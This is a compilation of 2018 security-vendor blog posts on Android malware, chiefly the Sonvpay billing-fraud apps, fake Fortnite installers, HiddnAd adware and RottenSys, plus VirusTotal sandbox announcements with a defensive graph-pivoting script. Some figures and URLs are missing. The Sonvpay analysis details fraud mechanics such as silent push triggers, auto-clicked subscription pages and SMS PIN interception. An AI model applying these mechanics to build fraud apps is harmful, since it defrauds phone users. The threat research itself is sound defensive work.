When it comes to maximizing the results of infection campaigns, mobile malware operators consider official app stores to be the holy grail. Getting a malicious app into an official store yields greater exposure to more potential victims, a cheap distribution channel and user trust. Moreover, malware apps that have already made it into an official store are more likely to fly under the radar of security controls for longer than those hosted on hijacked sites or rogue servers. IBM X-Force reports malicious apps to the official stores to have them removed before more users can be affected.

Malicious apps are a blight that both store operators and developers work hard to limit. Still, it is a recurring problem: In 2017, X-Force mobile researchers reported numerous occasions on which financial malware had sneaked into the Google Play Store, with the BankBot Android malware family leading the pack. The trend continues to escalate.

X-Force researchers suspect that the cybercrime services spreading mobile Trojans have mastered Google Play as a malware campaign channel and may be monetizing it. While such cybercrime services are rather popular with PC malware distributors, their rise in the mobile malware realm is an escalating risk factor users and organizations should be aware of.

To learn more about keeping devices safe from mobile malware, read our mobile malware mitigation tips.


The post Anubis Strikes Again: Mobile Malware Continues to Plague Users in Official App Stores appeared first on Security Intelligence.

Android Users Hit With Mobile Billing Fraud Due to Sonvpay Malware

Ever hear “Despacito” on the radio? Of course you did! It was the song of 2017 – taking over radios, dance clubs, and even ringtones on our cell phones. Take Android users for instance – many even downloaded the “Despacito for Ringtone” so they could enjoy the tune anytime they received a phone call. But what they didn’t know is that they could be involved in a cyberattack, rather than just listening to their favorite song. As a matter of fact, our McAfee Mobile Research team has found a new malicious campaign, named Sonvpay, that’s impacted at least 15 apps published on Google Play – including that Despacito app.

How it works

You know how with some of your apps you can adjust the push notifications? Sometimes these notifications pop up on your screen, and other times you won’t receive any – depending on your settings. To enact its malicious scheme, Sonvpay listens for incoming push notifications that contain the data they need in order to perform mobile billing fraud – which is when extra charges get added to a user’s phone bill and can potentially line a cybercriminal’s pocket.

Once it receives the data, Sonvpay can perform this mobile billing fraud (either WAP or SMS fraud) by displaying a fake update notification to the user. This fake notification has only one red flag: if the user scrolls to the end, the phrase “Click Skip is to agree” appears, as seen below.

If the user clicks the only button (Skip), Sonvpay will complete its mission – and will fraudulently subscribe the user to a WAP or SMS billing service, depending on the victim’s country.

What it affects

So which Android applications contain Sonvpay? The McAfee Mobile Research team initially found that Qrcode Scanner, Cut Ringtones 2018, and Despacito Ringtone were carrying Sonvpay, and Google promptly took them down once notified. But then more emerged, totaling 15 applications that contain Sonvpay, some of which have been installed over 50,000 times. These applications include:


  • Cut Ringtones 2018
  • Qrcode Scanner
  • QRCodeBar Scanner APK
  • Despacito Ringtone
  • Let me love you ringtone
  • Beauty camera-Photo editor
  • Night light
  • Shape of you ringtone
  • Despacito for Ringtone
  • Iphone Ringtone


So now the next question is – what do I do if I was one of the Android users who downloaded an application with Sonvpay? How can I avoid becoming a victim of this scam? Start by following these tips:

  • Only give your apps permission to what they need. When downloading one of these applications, one user reported they noticed that the app asked for access to SMS messages. This should’ve been a red flag – why would a ringtone app need access to your texts? Whenever you download an app, always double check what it’s requesting access to, and only provide access to areas it absolutely needs in order to provide its service.
  • Always read the fine print. Before you update or download anything, always make sure you scroll through all the information provided and read through it line by line. This may feel tedious, but it could be the difference between being compromised and remaining secure.
  • Use a mobile security solution. As schemes like Sonvpay continue to impact mobile applications and users, make sure your devices are prepared for any threat coming their way. To do just that, cover these devices with a mobile security solution, such as McAfee Mobile Security.

And, of course, to stay on top of the latest consumer and mobile security threats, be sure to follow me and @McAfee_Home on Twitter, listen to our podcast Hackable? and ‘Like’ us on Facebook.

The post Android Users Hit With Mobile Billing Fraud Due to Sonvpay Malware appeared first on McAfee Blogs.

AsiaHitGroup Returns With New Billing-Fraud Campaign

Are you tired yet of the music track “Despacito”? If you downloaded this ringtone app from Google Play, chances are your answer is a resounding Yes. But it gets worse: The McAfee Mobile Research team recently found 15 apps on Google Play that were uploaded by the AsiaHitGroup Gang. The ringtone app was one of them; these apps, downloaded 50,000 times from the official app store, were designed to steal money from their victims. The AsiaHitGroup Gang has been active since at least 2016, attempting to charge 20,000 victims for the download of popular mobile applications containing the fake-installer app Sonvpay.A. For more analysis, see the Mobile Research team’s post.

Ordinarily we advise users to review the requested permissions before installing a mobile app, and normally this is enough. In this case, the only permission requested was access to SMS messages, and once installed the app behaved as expected. In the background, however, Sonvpay silently used the push notification service to subscribe users to premium-rate services.

This campaign displays a significant level of customization. The criminals can tailor their fraud to the country of their choosing. In our analysis we looked at mobile billing fraud targeting users in Kazakhstan, Malaysia, and Russia. In Kazakhstan victims are subscribed to a premium-rate service whereas in Malaysia and Russia they are connected to a WAP billing service. Further, the criminals recognize that in Malaysia the mobile operator sends a PIN code, so the attackers include functionality to intercept the SMS. Once intercepted, the app communicates with the mobile operator to subscribe to the service.

This group began targeting users in Asia, but the move to Russia shows its increasing ambition. The goal of the AsiaHitGroup Gang remains the same, but the manner in which they attempt to achieve their ends differs per campaign, and their techniques are improving. Although the security industry focuses much attention on “loud” and destructive attacks, many campaigns quietly steal funds from unsuspecting victims or those who have little visibility into what is happening.

The post AsiaHitGroup Returns With New Billing-Fraud Campaign appeared first on McAfee Blogs.

AsiaHitGroup Gang Again Sneaks Billing-Fraud Apps Onto Google Play

The McAfee Mobile Research team has found a new billing-fraud campaign of at least 15 apps published in 2018 on Google Play. Toll fraud (which includes WAP billing fraud) is a leading category of potentially harmful apps on Google Play, according to the report Android Security 2017 Year in Review. This new campaign demonstrates that cybercriminals keep finding new ways to steal money from victims using apps on official stores such as Google Play.

The AsiaHitGroup Gang has been active since at least late 2016, distributing the fake-installer application Sonvpay.A, which attempted to charge at least 20,000 victims, primarily from Thailand and Malaysia, for the download of copies of popular applications. One year later, in November 2017, a new campaign was discovered on Google Play: Sonvpay.B used IP address geolocation to confirm the country of the victim and added Russian victims to the WAP billing fraud to increase its potential to steal money from unsuspecting users.

In January 2018, the AsiaHitGroup Gang returned to Google Play with the repackaged app Sonvpay.C, which uses silent background push notifications to trigger a fake update dialog. When victims start the “update” they instead subscribe to a premium-rate service. The subscription operates primarily via WAP billing, which does not require sending SMS messages to premium-rate numbers. Instead it requires only that the device reach a specific website over the mobile network, where the app automatically clicks a button to initiate the subscription process. Based on the approximate number of installations from Google Play, the cost of the premium-service subscription, and the days that these apps were available, we estimate that the AsiaHitGroup Gang could have potentially earned between $60,500–$145,000 since January.

Sonvpay on Google Play

The McAfee Mobile Research team initially found the following applications repackaged with Sonvpay on Google Play, all of them published this year:

Figure 1. Sonvpay apps found on Google Play.

We notified Google about these apps on April 10 and they were promptly removed. A couple of days later the app “Despacito for Ringtone” was found again on the store and was quickly removed. In total we found 15 apps that were installed at least 50,000 times since the first one, Cut Ringtones 2018, was released on Google Play in January 2018. The following table lists the 15 malicious apps:

At the time of download, the only red flag that a user could notice is that the app needs access to SMS messages. Once installed and executed, the app behaves as expected (QR code reader, ring tones, etc.). However, in the background and without the user’s knowledge, Sonvpay listens for incoming push notifications that contain the data to perform mobile billing fraud.

Background Push Notification and Fake Update Screen

Sonvpay employs the OneSignal push notification service to get the information to subscribe users to premium-rate services. To receive the data in the background without displaying a notification, Sonvpay implements the method “onNotificationProcessing” and returns “true” to make the notification silent:

Figure 2. Silent background notification.

The received data carries the parameters for WAP and SMS fraud, along with the information needed to display a fake update notification after the user has used the repackaged application for some time. This fake notification has only one bogus button. If the user scrolls to the end, the misleading phrase “Click Skip is to agree” appears:

Figure 3. Fake update notification.

If the user clicks the only button, Sonvpay will do its job. However, even with no interaction with this window, if the “price” value in the push notification is empty, Sonvpay proceeds to subscribe the user to a premium-rate service:

Figure 4. Starting mobile billing fraud if “price” value is empty.

Downloading the Dynamic Payload from a Remote Server

One of the parameters obtained from the silent push notification is a URL from which to request the location of the library that performs mobile billing fraud. Once the fake update notification is displayed, Sonvpay requests the download of the library from another remote server:

Figure 5. Sonvpay requesting library with additional functionality.

The new APK file is downloaded and stored in the path /sdcard/Android/<package_name>/cache/ so that it can be dynamically loaded and executed at runtime. The library we obtained for performing mobile billing fraud targeted only Kazakhstan and Malaysia but, because the library is present in a remote server and can be dynamically loaded, it can likely be updated at any time to target more countries or mobile operators.

WAP Billing and SMS Fraud

In the case of Kazakhstan, Sonvpay loads a specific URL delivered through the silent push notification and uses JavaScript to click on a button and on the element “activate” to fraudulently subscribe the user to a premium-rate service:

Figure 6. WAP billing fraud in Kazakhstan.

For Malaysia, the malware creates a new WebView to send the “Shortcode” and “Keyword” parameters to a specific URL to subscribe the user to a WAP billing service:

Figure 7. WAP billing fraud in Malaysia.

However, for Malaysia the app needs to intercept a confirmation code (PIN) sent by the mobile operator via SMS. Sonvpay has this SMS interception functionality implemented in the original repackaged application:

Figure 8. Processing an intercepted SMS message to get the confirmation PIN.

Once the PIN is obtained, it is sent to the mobile operator via a web request to automatically confirm the subscription. If the parameters for Kazakhstan or Malaysia do not match, Sonvpay still tries to perform mobile billing fraud by attempting to send an SMS message to a premium-rate number provided via the silent push notification:

Figure 9. Functionality to send an SMS message to a premium-rate number.

A Closer Look at Previous Campaigns

While looking for patterns in the 2018 campaign, we found the app DJ Mixer–Music Mixer. As soon as this application executes, it checks if the device has an Internet connection. If the device is offline, the app shows the error message “You connect to internet to continue” and ends its execution. If the device is online, the app executes a web request to a specific URL:

Figure 10. Web request to the AsiaHitGroup Gang URL.

We learned the apps created by the developer SHINY Team 2017 were available on Google Play in September 2017; earlier Sonvpay variants were discovered in November 2017. The primary behavior of the two variants is almost the same—including the changing of the main icon and the app’s name to Download Manager to hide its presence from the user. However, with DJ Mixer, the geolocation of the IP address identifies the country of the infected device and aids the execution of the mobile billing fraud:

Figure 11. Using IP geolocation to target specific countries.

In this case only three countries are targeted via the geolocation service: Russia (RU), Thailand (TH), and Malaysia (MY). If the IP address of the infected device is not from any of these countries, a dialog claims the app is not active and that the user needs to uninstall it and update to the latest version.

If the country is Thailand or Malaysia, the malicious app randomly selects a keyword, which determines the image used to offer users premium-rate services. For Malaysia the image includes English text with terms of service and a “Subscribe” button to accept the randomly selected premium-rate service:

Figure 12. Screens displayed when the country of the IP address is Malaysia.

In the case of Thailand, the text is in Thai and includes a small version of terms of service along with instructions to unsubscribe and stop the charges:

Figure 13. Screens shown when the country of the IP address is Thailand.

Finally, with Russia no image is shown to the user. The app fraudulently charges the user via WAP billing while enabling 3G and disabling Wi-Fi:

Figure 14. Forcing the use of 3G to start WAP billing fraud.

We also found similar apps from late 2016 that performed SMS fraud by pretending to be legitimate popular applications and asking the user to pay for them. Their text is similar to the 2018 campaign’s fake update dialog but is labeled “Term of user”:

Figure 15. Fake-installer behavior asking the user to pay for a popular legitimate app.

If the user clicks “No,” the app executes as expected. However, if the user clicks “Yes,” the app subscribes the user to a premium-rate service by sending an SMS message with a specific keyword to a short number. Next the mobile operator sends the device a PIN via SMS; the malware intercepts the PIN and returns it via web request to confirm the subscription.

Once the user is fraudulently subscribed to a premium-rate service to download a copy of a free app on official app stores, the malware shows the dialog “Downloading game…” and proceeds with the download of another APK stored on a third-party server. Although the APK file that we downloaded from the remote server is a copy of the legitimate popular app, the file can be changed at any point to deliver additional malware.

Unlike in previous campaigns, we did not find evidence that these fake-installer apps were distributed via Google Play. We believe that they were distributed via fake third-party markets, where users looking for popular apps are tricked into downloading APK files from unknown sources. In June 2018 ESET and Sophos found a new version of this variant pretending to be the popular game Fortnite. The fake game was distributed via a YouTube video that asked the user to download the fake app from a specific URL. This recent campaign shows that the cybercriminals behind this threat are still actively tricking users into installing these fake applications.

Connections Among Campaigns

All of these campaigns rely on billing-fraud apps targeting users in Southeast and Central Asia and share behaviors such as the use of almost the same text and images to trick users into subscribing to premium-rate services. Other potential connections among the three campaigns suggest that all the apps are likely from the same actor group. For example, apps from all campaigns use the same string as a debug log tag:

Figure 16. The “SonLv” string used as a log tag occurs in all campaigns.

There is also a notable similarity in package and class names and in the use of a common framework (telpoo.frame) to perform typical tasks such as database, networking, and interface support:

Figure 17. Common package and class names in all campaigns.

Finally, apps from the Google Play campaigns use the domain vilandsoft[.]com to check for updates. The same domain is also used by apps from the fake-installer campaign to deliver remote-execution commands, for example, action_sendsms:

Figure 18. A fake-installer app checking for the command action_sendsms.

The following timeline identifies the campaigns we have found from this group, the strategies used to trick users into installing the apps, the distribution methods, the main payload, and the targeted countries:

Figure 19. A timeline of Sonvpay campaigns.

Sonvpay campaigns are one example of how cybercriminals like the AsiaHitGroup Gang constantly adapt their tactics to trick users into subscribing to premium-rate services and boosting their profits. The campaigns started in late 2016 with very simple fake installers that charged users for copies of popular apps. In late 2017, Google Play apps abused WAP-billing services and used IP address geolocation to target specific countries. In 2018, Google Play apps used silent background push notifications to trigger the display of a fake update message and to gather data for mobile billing fraud. We expect that cybercriminals will continue to develop and distribute new billing fraud campaigns to target more countries and affect more users around the world.

Cybercriminals always follow the money, and one of the most effective ways to steal money from users is via billing fraud. A victim will likely not notice a fraudulent charge, for example, until it appears on the mobile bill at the end of the month. Even when the payment is detected early, most of the time the charge is for a subscription rather than a one-time payment. Thus victims will need to find a way to unsubscribe from the premium-rate service, which may not be easy if the subscription occurred silently or if the app does not provide that information. Also, the fact that WAP-billing fraud does not require sending an SMS message to a premium-rate number makes it easier to commit: cybercriminals need only silently subscribe users by forcing them to load the WAP-billing service page and click on its buttons. For these reasons we expect that mobile billing fraud will continue to target Android users.

McAfee Mobile Security detects this threat as Android/Sonvpay. To protect yourself from this and similar threats, employ security software on your mobile devices, check user reviews for apps on Google Play, and do not accept or trust apps that ask for payment via SMS messages as soon as the app is opened or without any interaction.

The post AsiaHitGroup Gang Again Sneaks Billing-Fraud Apps Onto Google Play appeared first on McAfee Blogs.

Heads Up Gamers! Fake Fortnite Android Apps Are Being Spread via YouTube Videos

Does the name “Fortnite” ring any bells? It should, because it’s probably the most popular video game in the world right now, garnering the attention of millions of fans and even a few celebrities. Oh, and a handful of cybercriminals as well. Despite the fact that the game is not yet available for Android, crooks are advertising “leaked” versions of Epic Games’ Fortnite — by releasing YouTube videos with fake links claiming to be Android versions of the game.

This scam begins with a user conducting a simple Google or YouTube search for “Download Fortnite for Android” or “How to install Fortnite on Android.” This search provides users with dozens of videos – some of which have millions of views – that claim they can show how to get the game on Android. From there, people are then directed to download one of the fake Fortnite apps.

These fake apps do a great job of seeming convincing, as many use the same images and loading screens found in the iOS app. They even play the game’s intro song and prompt users to log in – seems legitimate, right? But soon enough, the apps reveal their true colors.

The apps will ask the user for “mobile verification,” which the user confirms by hitting OK. Then, users get redirected to a site claiming to check whether they’re a bot, which requires them to download another app and then click on a link that comes with the “unlock instructions” within that app. Once users hit “tap to install,” however, they’re only guided back to Google Play. Users can keep installing app after app and will never actually reach the Fortnite game.

Essentially, this means the cybercriminals are aiming to make money off of increased app downloads. This incident reminds us that online gaming has its risks, and Fortnite is no exception. Therefore, in order to stay protected from this scam and others like it, be sure to follow these tips:

  • Do your homework. Know your game – find out when and where it is available on different platforms. And if for some reason your research yields mixed results, check the game’s main page to confirm the answer.
  • Go straight to the source. It’s a good security rule of thumb for anything out there – do not download something unless you are getting it from the company’s home page. The most trusted source is the original one, so make sure you’re using the real deal. If you’re an Android user, it’s best to just wait for Epic Games’ version of Fortnite in order to avoid frauds.
  • Use comprehensive security. Whether you’re using the mobile iOS version of Fortnite, or gaming on your computer, it’s important you lock down all your devices with an extra layer of security. To do just that, use a comprehensive solution such as McAfee Total Protection.

And, of course, to stay on top of the latest consumer and mobile security threats, be sure to follow me and @McAfee_Home on Twitter, listen to our podcast Hackable? and ‘Like’ us on Facebook.

The post Heads Up Gamers! Fake Fortnite Android Apps Are Being Spread via YouTube Videos appeared first on McAfee Blogs.

Fake Fortnite for Android links found on YouTube

The extremely popular video game Fortnite is coming to Android sometime this summer, and the fanbase is going wild. Not surprisingly, mobile malware developers are taking advantage. Already, there are several videos on YouTube with links claiming to be versions of Fortnite for Android, despite the fact the game has yet to be released on this platform.

Swati Khandelwal of The Hacker News highlights the emerging threat in her article, Epic Games Fortnite for Android–APK Downloads Leads to Malware. Taking it a step further, I grabbed some of these malicious apps and took them for a spin.

The source of infection

The apps are not located on the Google Play Store. Instead, people have found them by searching “How to install Fortnite on Android” or “Fortnite for Android” in Google, or stumbling across links in YouTube ads. From there, the apps can be downloaded.

My findings for the so-called Fortnite for Android app are that it’s a simple program that comes in two different package names (so far):



Simple, but malicious nonetheless

To make the app look legit, it starts with a realistic-looking icon. As a matter of fact, it’s so realistic that some may recognize it from the Apple iOS version. By stealing the icon directly from Apple, how could it not look real?

When opening the app, it displays the Epic Games logo to further trick users.

Next, once again stealing from iOS, a loading screen appears.

iOS stolen loading screen

After the loading screen, it starts playing the Fortnite intro song and opens a screen that displays “New Updates,” the first indication something might be up.

By just clicking on the screen, it moves onto a different screen that makes more sense. It states that it’s “Logging In…” and looks very authentic (as well as very stolen).

The next screen is where things go sideways. It requires a Mobile Verification.

Click “OK” and the app redirects to a website via your default browser. There, it claims to be for the purpose of verifying “You’r Not A BOT” (bad grammar and all) in order to proceed to Fortnite. To “verify,” the user must complete a task, which involves downloading another “free” app.


Click on a link and a pop-up promising “Unlock Instructions” appears.

Press “Tap to Install” and it redirects you to Google Play—that’s right, a bit of silver lining. The redirect is at least to a legit, safe Google Play version of an app.

The bad news is that no matter how many apps you download, the game never unlocks—because it never existed within the malicious app in the first place.

Yep, I know this game

The scheme goes like this: Get a couple of over-excited people salivating for a chance to play Fortnite on Android, and get paid. The more downloads that come from the website shown above, the more money the malware developers can make. With the app being so simplistic, the amount of development effort is pretty low for the amount that could be potentially gained. Hopefully, we can help stop the revenue stream by detecting this one as Android/Trojan.FakeFortnite.

Patience is a virtue

Every time there is a craze around a new video game release, we see malware authors jumping into the game. Often, it’s an attack against our good senses. They capitalize on that little itch that screams “I want it now!” We suggest listening to that other inner voice that warns, “This seems too good to be true.” Our advice: be patient. If you wait for the official release by Epic Games in the Google Play Store this summer, you won’t have to spend the ensuing months cleaning malware off your Android. Stay safe out there!

The post Fake Fortnite for Android links found on YouTube appeared first on Malwarebytes Labs.

Multisandbox project welcomes Cyber adAPT ApkRecon

Two weeks ago we announced the release of our new VirusTotal Droidy Android sandbox, a virtual environment that executes Android applications in an automated fashion in order to capture all the actions that the given app performs on the operating system.

Today we are excited to announce that Cyber adAPT is becoming a multisandbox project partner and will be contributing data from its ApkRecon product to the fight against malware. Like Droidy, its solution also focuses on the Android environment. In their own words:

ApkRecon is a sandbox environment developed by the research team at Cyber adAPT.  Amongst many features, the sandbox boasts a baited Android environment, a decrypted network application level capture, and an attack payload triggering system to gain insight into the true intent of each piece of analyzed malware. ApkRecon is also used to generate detection logic for Cyber adAPT’s Mobile Threat Detection product to keep users safe all around the world.

These are some example reports displaying the data contributed by Cyber adAPT:

It is worth highlighting the usefulness of this kind of data. When facing unknown files for which you have no context, it provides rich contextual information that allows analysts to form an initial judgement of the file before diving into dissecting it. For example, looking at the last example report above, we notice that the file performs an HTTP POST to:


This is a URL that we can look up in VirusTotal Graph and jump to the host referenced in the URL, i.e. When exploring this host we notice that only the file under consideration has communicated with it. However, expansions are available according to the referrer files relationship. This relationship pinpoints files that contain the given host within their body, even if they have not been seen communicating with it. Let’s follow this notion; something shady seems to be going on:

Badness is much easier to spot when studying the sample characterised in this other report:

In this case the APK reaches out to the URL:


From there we can jump to the domain entity, i.e., and expand the URLs observed under that domain, as well as the files communicating with it. Just two hops and we already have a preliminary idea that the initial APK that reached out to the aforementioned URL is malicious:

These examples highlight the importance of extracting as many attributes and behavioral details as possible from files, not only because they allow us to better understand a particular threat, but because they connect the dots and reveal entire campaigns. For instance, very often blocking a given network location will render ineffective all malware variants of a given campaign (they can no longer reach the mothership server), so even when certain variants fly under detection radars, there is still hope that network security measures will stop a given attack.
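The two-hop walk described above (URL to host, host to the files that communicated with it or merely embed it, and from those files on to further hosts) can be reproduced offline over any set of sandbox reports. The following is an added example written for this page, not VirusTotal code or its API; it runs over a constructed set of reports with placeholder hashes and hosts under the reserved `.test` domain, and the `contacted_urls` / `embedded_hosts` field names are assumptions standing in for the "communicating files" and "referrer files" relationships:

```python
"""Pivot across sandbox reports: URL -> host -> files -> hosts, for a fixed number of hops."""
from collections import defaultdict
from urllib.parse import urlparse

# Constructed sample reports (not real VirusTotal data). Each holds the file's hash,
# the URLs it contacted in the sandbox, and host names found as plain strings in its
# body (the "referrer files" relationship: embedded, but not necessarily contacted).
SAMPLE_REPORTS = [
    {"sha256": "sha256-A", "contacted_urls": ["http://gate.c2-sample.test/upload.php"],
     "embedded_hosts": ["gate.c2-sample.test"]},
    {"sha256": "sha256-B", "contacted_urls": [],
     "embedded_hosts": ["gate.c2-sample.test", "cdn.c2-sample.test"]},
    {"sha256": "sha256-C", "contacted_urls": ["https://www.example.org/"],
     "embedded_hosts": ["www.example.org"]},
    {"sha256": "sha256-D", "contacted_urls": ["http://cdn.c2-sample.test/payload.apk"],
     "embedded_hosts": ["cdn.c2-sample.test"]},
]


def build_graph(reports):
    """Index reports as host -> {'communicating': {hashes}, 'referrer': {hashes}}."""
    graph = defaultdict(lambda: {"communicating": set(), "referrer": set()})
    for rep in reports:
        for url in rep["contacted_urls"]:
            host = urlparse(url).hostname
            if host:
                graph[host]["communicating"].add(rep["sha256"])
        for host in rep["embedded_hosts"]:
            graph[host]["referrer"].add(rep["sha256"])
    return graph


def pivot_from_url(reports, url, max_hops=2):
    """Start at a URL and alternate host->files->hosts expansions for max_hops hops.

    Returns (related_hosts, related_files); the starting host is excluded from the hosts.
    """
    graph = build_graph(reports)
    by_hash = {rep["sha256"]: rep for rep in reports}
    start = urlparse(url).hostname
    frontier_hosts = {start}
    seen_hosts, seen_files = {start}, set()
    for _ in range(max_hops):
        # host -> files, using both relationship types
        new_files = set()
        for host in frontier_hosts:
            new_files |= graph[host]["communicating"] | graph[host]["referrer"]
        new_files -= seen_files
        seen_files |= new_files
        # files -> hosts they contacted or embed
        frontier_hosts = set()
        for file_hash in new_files:
            rep = by_hash[file_hash]
            for contacted in rep["contacted_urls"]:
                hostname = urlparse(contacted).hostname
                if hostname:
                    frontier_hosts.add(hostname)
            frontier_hosts.update(rep["embedded_hosts"])
        frontier_hosts -= seen_hosts
        seen_hosts |= frontier_hosts
    seen_hosts.discard(start)
    return seen_hosts, seen_files


if __name__ == "__main__":
    hosts, files = pivot_from_url(SAMPLE_REPORTS, "http://gate.c2-sample.test/upload.php")
    print("related hosts:", sorted(hosts))
    print("related files:", sorted(files))
```

Starting from the single URL, the walk picks up sha256-B (which never contacted the host but embeds it), and through B reaches the second host and the file that downloads a payload from it, while the unrelated sha256-C stays out of the picture. In practice the hosts surfaced this way are the candidates for network blocking mentioned in the paragraph above.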

This kind of approach to block badness is something that we have shaped into a particular paper hosted in our space, more specifically the paper entitled VirusTotal Intelligence for banking trojans. In this paper malicious network infrastructure is shut down by contacting the pertinent domain registrars and hosting providers, however, organizations can also blacklist these locations in their network security controls.

Meet VirusTotal Droidy, our new Android sandbox

Recently we called out Additional crispinness on the MacOS box of apples sandbox. Continuing with our effort to improve our malware behavior analysis infrastructure, we are happy to announce the deployment of a new Android sandbox that replaces the existing system, which was developed back in 2013.

This setup characterises the actions that Android APKs perform when installed and opened; it has been baptised as “VirusTotal Droidy”. Droidy has been integrated in the context of the multisandbox project and extracts juicy details such as:
  • Network communications and SMS-related activity. 
  • Java reflection calls. 
  • Filesystem interactions. 
  • SQLite database usage. 
  • Services started, stopped, etc. 
  • Permissions checked. 
  • Registered receivers. 
  • Crypto-related activity. 
  • Etc. 

You may find below a couple of reports showcasing this new functionality. Just select the “VirusTotal Droidy” entry in the multisandbox report selector (whenever there are multiple reports):

Don’t forget to also check the detailed report:

This advanced view allows you to dig into the hooked calls and take a look at the screenshots generated when running the apps:

The multisandbox project is in good shape, and now many samples have reports for multiple sandboxes. For instance, the following report allows you to see the output of Tencent HABO and VirusTotal Droidy:
As you can see, they are pretty complementary, proving the value of having different sandboxing technologies studying the same files.

To understand the extent to which this is an improvement with respect to the 2013 setup, you can take a look at the following report. It displays by default the output of the old sandbox. Use the selector to see the new report with VirusTotal Droidy:

Now, these may seem like minimal features to improve VirusTotal’s “microscope” capabilities for better understanding a particular threat. In fact, the changes go much deeper. All of our sandboxing information nurtures other services such as VirusTotal Intelligence and VirusTotal Graph. The richer the information that we generate for individual data set items, the greater the telescopic capabilities of VirusTotal. This is how we manage to fill in the dots and quickly see all activity tied to certain resources that often show up in malware investigations. For example, let us look at the graph of one of the domains seen in the previous reports:

At a glance you can understand that something shady is going on with and you are able to discover other malicious domains such as,,, etc. Some of these, for instance, are not only used as C2 infrastructure for malware but also serve as malware distribution points.

Very often during an investigation, you might not have enough context about an individual threat, and so being able to look at the connected URLs, domains, files, IP addresses, etc. becomes crucial in understanding what is going on. My colleague Evan explains this far better than I can do in just a couple of paragraphs, so make sure you check out his video dissecting a cryptomining attack at

Wrapping up, don’t think of this as just new functionality to dissect individual threats. All of this data contributes to the bigger picture and increases the power of our telescope lens that sheds light into malicious behaviors on the Internet.  

Seven Android Apps Infected With Adware, Downloaded Over 500,000 Times

How much we use our apps, and how many apps we use, has shown no signs of slowing. And as the McAfee Labs Threats Report: March 2018 tells us, mobile malware has shown no signs of slowing either. Now, a tricky Android malware dubbed Andr/HiddnAd-AJ is adding to the plethora of mobile strains out there. The malware managed to sneak onto the Google Play Store disguised as seven different apps – which have collectively been downloaded over 500,000 times.

Slipping onto the Google Play store via six QR reader apps and one smart compass app, the malware manages to sneak past security checks through a combination of unique code and no initial malicious activity. Following installation, Andr/HiddnAd-AJ waits for six hours before it serves up adware. When it does, it floods a user’s screen with full-screen ads, opens ads on web pages, and sends various notifications containing ad-related links, all with the goal of generating click-based revenue for the attackers.

These apps have since been taken down by Google. However, it’s still crucial that Android users are on the lookout for Andr/HiddnAd-AJ malware and other adware schemes like it. Start by following these security tips:

  • Do your homework. Before you download an app, make sure you head to the reviews section of an app store first. Be sure to thoroughly sift through the reviews and read through the comments section; Andr/HiddnAd-AJ may have been avoided if a user read one of the comments and saw that the app was full of unnecessary advertisements. When in doubt, don’t download any app that is remotely questionable.
  • Limit the amount of apps. Only install apps you think you need and will use regularly. And if you no longer use an app, uninstall it. This will help you save memory and reduce your exposure to threats such as Andr/HiddnAd-AJ.
  • Don’t click. This may go without saying, but since this is a click-generated revenue scheme, do whatever you can to avoid clicking pop-ups and unwarranted advertisements. The less you click, the less cybercriminals will profit.
  • Use a mobile security solution. As malware and adware campaigns continue to infect mobile applications, make sure your mobile devices are prepared for any threat coming their way. To do just that, cover these devices with a mobile security solution, such as McAfee Mobile Security.


The post Seven Android Apps Infected With Adware, Downloaded Over 500,000 Times appeared first on McAfee Blogs.

McAfee Safe Connect, Two Gold Award Winners of 2018 Info Security PG’s Global Excellence Awards®

On February 28th, Info Security Products Guide Global Excellence Awards presented their 2018 award winners. We are humbled to have received two golds in the Product or Service Excellence of the Year — Security Information and Website & Web Application Security for McAfee Safe Connect.

Product Overview:

McAfee Safe Connect is a VPN (Virtual Private Network) that helps users create secure online connections while using the internet. Doing so helps our customers minimize their individual security risks and helps keep their data private – especially when connecting to a public or open Wi-Fi network. Unlike home Wi-Fi, many public Wi-Fi networks (commonly offered at cafés, airports and hotels) aren’t password-protected and don’t encrypt the user data transmitted through them. Therefore, when you connect to a hotspot, your online activities, from your social media activity to your online purchase history and even your bank account credentials, may be wide open to hackers. With McAfee Safe Connect, you can rest assured that your information and online activities are encrypted.

McAfee has a proven record of providing security for consumers in the digital age. To address growing concerns over Wi-Fi security, we created an award-winning VPN that would keep users’ personal information secure from online threats and unsecure networks.

McAfee Safe Connect has over 1 million downloads across Google Play and the App Store with an impressive 4.3-star rating. It is available in over 20 languages to users worldwide.

Tech behemoth Samsung also chose McAfee Safe Connect VPN for their Galaxy Note 8 – Secure Wi-Fi feature and expanded collaboration with its newly announced Galaxy S9 Smartphones.

About Info Security PG’s Global Excellence Awards

Info Security Products Guide sponsors the Global Excellence Awards and plays a vital role in keeping individuals informed of the choices they can make when it comes to protecting their digital resources and assets. The guide is written expressly for those who wish to stay informed about recent security threats and the preventive measures they can take. You will discover a wealth of information in this guide, including tomorrow’s technology today, best deployment scenarios, people and technologies shaping cyber security, and industry predictions & directions that facilitate making the most pertinent security decisions. Visit for the complete list of winners.

We are proud of recognition given to McAfee Safe Connect, which aims to safeguard every Internet user’s online privacy. Please check out our award-winning Wi-Fi Privacy VPN product: McAfee Safe Connect.

Interested in learning more about McAfee Safe Connect and mobile security tips and trends? Follow @McAfee_Home on Twitter, and ‘Like’ us on Facebook.

The post McAfee Safe Connect, Two Gold Award Winners of 2018 Info Security PG’s Global Excellence Awards® appeared first on McAfee Blogs.

RottenSys Malware Reminds Users to Think Twice Before Buying a Bargain Phone

China is a region that has been targeted with mobile malware for over a decade, as malware authors there are continually looking at different tactics to lure victims. One of the most innovative tactics that we have come across in the past several years is to get victims to buy discounted devices from sellers that have compromised the smartphone beforehand. And now, one of these campaigns, Android.MobilePay (also dubbed RottenSys), is making headlines, though McAfee has been aware of it for over two years. The tactic used by the author(s)/distributors is straightforward: they install fake apps on a device that pretend to provide a critical function but often never get used.

RottenSys is stealthy. It doesn’t provide any secure Wi-Fi related service but is rather an advanced strain of malware that requests almost all sensitive Android permissions to enable its malicious activities. In order to avoid detection, RottenSys doesn’t come with an initial malicious component or immediately initiate malicious activity. The strain has instead been designed to communicate with its command-and-control servers to obtain the actual malicious code, which it then installs onto the device and executes.

Given that it installs any new malicious components from its C&C server, RottenSys can be used to weaponize or take full control over millions of infected devices. In fact, it seems that the hackers behind RottenSys have already started turning infected devices into a massive botnet.

This attack is an indication of change, as over the past two years the mechanism of fraud has adapted. In the past, scams such as this typically used premium SMS fraud to generate revenue: the device reaches out to a premium number and incurs small charges that go unnoticed over an extended period. As described in detail in our Mobile Threat Report: March 2018, we have seen traditional attack vectors, such as premium text messages and toll fraud, replaced by botnet ad fraud, pay-per-download distribution scams, and crypto-mining malware that can generate millions in revenue.

